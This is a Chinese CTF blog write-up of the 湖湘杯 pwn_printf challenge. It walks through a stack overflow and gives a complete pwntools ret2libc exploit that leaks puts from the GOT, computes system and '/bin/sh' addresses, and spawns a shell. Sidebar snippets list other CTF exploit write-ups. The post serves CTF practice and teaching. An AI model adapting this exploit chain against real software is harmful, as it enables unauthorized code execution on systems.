湖湘杯hxb_pwn

最新推荐文章于 2022-04-19 18:39:07 发布
最新推荐文章于 2022-04-19 18:39:07 发布
阅读量160 收藏
点赞数
分类专栏: Pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/YangZiTrick/article/details/109563899
版权

湖湘杯hxb_pwn

pwn_printf

pwn_libc

ida

在这里插入图片描述

16次循环
下面if判断v12<=0x20
所以写

for i in range(16):
	n.sendline("32")

跟进if下面的函数

在这里插入图片描述

这里变量的栈是空栈0h,所以offset只需要64bit程序的8个就行。
再然后a * a1,所以传参需要double 0x20,也就是0x40
ROPgadget --binary pwn_printf
找到pop_rdi_ret的地址
复习一下libc64_payload公式

64位payload: payload = "a"*offset + p64(pop_rdi) + p64(got) + p64(plt) + p64(ret_addr/main)

写exp:

from pwn import *
sh = process('./pwn_printf')
elf = ELF('./pwn_printf')
puts_plt = elf.plt['puts']
puts_got = elf.got['puts']
pop_rdi = 0x401213
for i in range(16):
	n.sendline("32")
payload = 'a' * 8 + p64(pop_rdi) + p64(puts_got) + p64(puts_plt) + p64(pop_rdi) + p64(0x40) + p64(0x4007C6)
sh.send(payload)
sh.recvuntil('You will find this game very interesting\n')
puts_addr = u64(sh.recvn(6).ljust(8, '\x00'))
print(hex(puts_addr))

这就print出来了puts的地址

在这里插入图片描述

libc database search查一下相关libc信息

在套用一下公式

libc_base = puts_addr - 0x080a30    # -libc_Offset的puts

system_addr = libc_base + 0x04f4e0   # +libc_Offset的system

bin_sh_addr = libc_base + 0x1b40fa		# +libc_Offset的bin/sh

复习一下libc64_getshell公式

getshell: "a"*offset + p64(ret) + p64(pop_rdi) + p64(str_bin_sh) + p64(system_addr)

完整exp:

from pwn import *
sh = process('./pwn_printf')
elf = ELF('./pwn_printf')
puts_plt = elf.plt['puts']
puts_got = elf.got['puts']
pop_rdi = 0x401213
for i in range(16):
	sh.sendline("32")
payload = 'a' * 8 + p64(pop_rdi) + p64(puts_got) + p64(puts_plt) + p64(pop_rdi) + p64(0x40) + p64(0x4007C6)
sh.send(payload)
sh.recvuntil('You will find this game very interesting\n')
puts_addr = u64(sh.recvn(6).ljust(8, '\x00'))
print(hex(puts_addr))
libc_base = puts_addr - 0x080a30 #0x6f6a0
system_addr = libc_base + 0x04f4e0 #0x0453a0
bin_sh_addr = libc_base + 0x1b40fa #0x18ce17 
payload = 'a' * 8 + p64(0x4007C6) + p64(pop_rdi) + p64(bin_sh_addr) + p64(system_addr)

sh.send(payload)

sh.interactive()
_Trick_
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
2017湖湘pwn300
12-03
2017湖湘pwn300的题目,请大家自行下载。。。。。。
2017湖湘pwn200
12-02
2017湖湘pwn200的题目,请大家自行下载。。。。。。
pwn-湖湘2020
doudoudedi
11-04 501
from pwn import * p=process('./bh') elf=ELF('./bh') libc=elf.libc context.terminal=['tmux','splitw','-h'] def menu(idx): p.sendlineafter(">>",str(idx)) def add(): menu(1) def show(idx): menu(2) p.sendlineafter("index?\n",str(idx)) de
湖湘pwn400的wp
一个码农的笔记
12-09 2018
湖湘pwn比赛很有趣,我做了pwn300的题目,感觉不错,我把wp分享出来,pwns的下载链接是: http://download.csdn.net/download/niexinming/10152069 把pwn400直接拖入ida中: main函数: Create Profile函数: Print Profile函数: Update Profile函数: Ex
2017湖湘pwn100的题目
11-30
2017湖湘pwn100的题目的二进制文件和libc的二进制文件
c代码-HXB测试代码
07-14
在本压缩包中,我们有两个文件:`main.c`和`README.txt`,它们与"C代码-HXB测试代码"这个主题密切相关。`main.c`是一个C语言源代码文件,通常包含程序的主要执行逻辑,而`README.txt`则可能包含关于项目、测试或代码...
WanAndroid-HXB::high_voltage:致力于打造一款极致体验的 http
05-01
Awesome-WanAndroid致力于打造一款极致体验的WanAndroid客户端,知识和美是可以并存的哦QAQn(≧▽≦)n ,更好的 Awesome-WanAndroid V1.2.1正式版发布,相比初始版本,项目的稳定性和界面的美化程度已提升了几个档次...
2017湖湘 pwn300
weixin_45966329的博客
02-28 155
2017湖湘 pwn300 该题为简单栈溢出,利用方法如下: (1)覆盖返回地址为read函数读入shellcode (2)执行mprotect让bss段的地址变的可执行 (3)跳转shellcode执行即可 from pwn import * context(os='linux',arch='x86',log_level='debug') io=remote("node3.buuoj.cn",29028) #io=process("pwn300") elf=ELF('pwn300') def add
两道pwn题中的小trick
臭nana的博客
04-19 250
1、get_started_3dsctf_2016 比较常规的解法:   由于这题没有出现setbuf(stdin,0),所以本题的输出是缓存在服务器本地的,换句话说:如果程序不正常退出,本题是不会回显flag的。但是本题提供了exit()函数,注意再调用get_flag函数后再ret到exit()函数就可以回显flag了。 参考: buuoj get_started_3dsctf_2016 WriteUp - CSULuyao - 博客园 from pwn import * import sy
2017湖湘pwn300的wp
一个码农的笔记
12-03 1072
湖湘pwn比赛很有趣,我做了pwn300的题目,感觉不错,我把wp分享出来,pwns的下载链接是:http://download.csdn.net/download/niexinming/10143408 把pwn300直接拖入ida中: main函数: add函数: 这个题目很有意思,首先开辟一个3到255大小的堆空间,然后做加减乘除的计算之后把计算结果放入堆中,最后可以把所有
buuoj Pwn writeup 256-260
yongbaoii的博客
09-01 296
256 ciscn_2019_s_2 257 qwb2019_one 258 hxb_pwn300 259 others_easyheap 260 pwnable_bf # -*- coding: utf-8 -*- '''#coding:utf8 from pwn import * #预先生成一个可以pass的payload payload = '' for i in range(50): payload += '0' payload += p8(0x100-0x40 +
HITCTF PWN300--dynelf
Vccxx的博客
04-08 993
第一次用Dynelf,脚本调了一下午。。hitctf pwn300题目链接:http://pan.baidu.com/s/1eSCCOE2漏洞分析:三个write之前的一个函数调用了read来读入字符,而这里存在明显的缓冲区溢出,可以覆盖main函数的栈地址,这个题没给libc,got表里没有system之类的函数,于是考虑用dynelf。攻击脚本:from pwn import * io = pr
XDCTF PWN300&400 Writeup
这里没人
05-14 691
打了2天的XDCTF,被Reverse的题目教做人了。Sad (T.T) 到是pwn的题目基本打通了,除了最简单的pwn100 (T.T) pwn300和pwn400比较简单,所以writeup我就放在一起了。 PWN300 做完PWN300,感觉不会再有女朋友了T.T 就不吐槽猥琐的出题人了,直接开始分析程序。 checksec后发现竟然没有开nx,直接shellcode...
2017湖湘pwn100的wp
一个码农的笔记
11-30 2709
湖湘pwn比赛很有趣,我做了pwns100的题目,感觉不错,我把wp分享出来,pwns的下载链接是:http://download.csdn.net/download/niexinming/10139497 把pwns100直接拖入ida中: main函数: base64解码函数 输入函数 可以看到read可以输入的字符串可以长达0x200个,这里可造成缓冲区溢出漏洞
湖湘2021-pwn-final部分复现
qq_53062301的博客
12-09 4915
第一次参加awd+,虽然成绩不是很好(大佬太多被打烂了),有很多收获,awd+赛制中可以通过攻击和防御两个手段来得分,攻击的话就是类似于正常的ctf,只不过如果成功攻击后,平台会使用官方的exp来去打全场,就是如果攻击成功,每轮(这次湖湘是20分钟一轮)都会获得攻击得分,得分会随着做题成功人数增多而减少,防御的话就是patch一下程序,然后通过ftp上传到服务器上,然后申请防御,也是防御成功就会每轮都会得分,但是防御有三种情况,一种是exp利用成功,也就是没有防御成功,还有一种清况,就是c...
湖湘2020
pwnyuan's blog
11-05 1068
湖湘2020BeforeMisc虚实之间思路CryptoLFSXOR描述源码思路EXP古典美++描述思路After Before 有幸作为队里挂件打了湖湘,好家伙,平台从下午开始就搞事情,我们藏了两flag,最后一直交不上,也不是交不上,是交上了,不亮,不给分,吓得我们最后不怎么做了,就疯狂交flag,淦 Misc 另外passwd和隐藏的秘密,是内存取证,我不会用volatility,这两题是队友写的 我还在复现,不是,是在学习怎么使用他 虚实之间 思路 打开发现要密码,直接拉到ARCHPR里面爆破
2020 湖湘 PWN WriteUp
SkYe's Blog
11-11 711
比赛的时候出去玩了,这就来复盘 babyheap 基本情况 增删查改,数量限制比较宽松挺大的,大小固定 0xf8 。 漏洞 safe_read 写入大小为 0xf8 会溢出修改下一个 chunk size 最低两位为 \x00 。 char *__fastcall safe_read(char *ptr, int size) { char *result; // rax read(0, ptr, 0xF0uLL); result = &ptr[size]; .
maixpy_v0.6.0_0_g1f5d688_minimum_with_ide_support
最新发布
07-25
对于固件版本maixpy_v0.6.0_0_g1f5d688_minimum_with_ide_support,根据引用\[1\]中提供的链接,我们可以看到该固件版本是maixpy_v0.6.0_0_g1f5d688_minimum_with_ide_support。这个固件版本是MaixPy的一个最小集合,支持连接MaixPy IDE,并且可以运行各种模型。所以,如果你想使用MaixPy IDE并且运行各种模型,这个固件版本是适合的选择。 #### 引用[.reference_title] - *1* [K210(SiPEED MaixBit)MicroPython使用参考(五、录音到SD卡)](https://blog.csdn.net/weixin_41784968/article/details/124792211)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^koosearch_v1,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* *3* [MaixPy系列开发板(Maix Duino)环境配置](https://blog.csdn.net/hxb971002/article/details/125876995)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^koosearch_v1,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值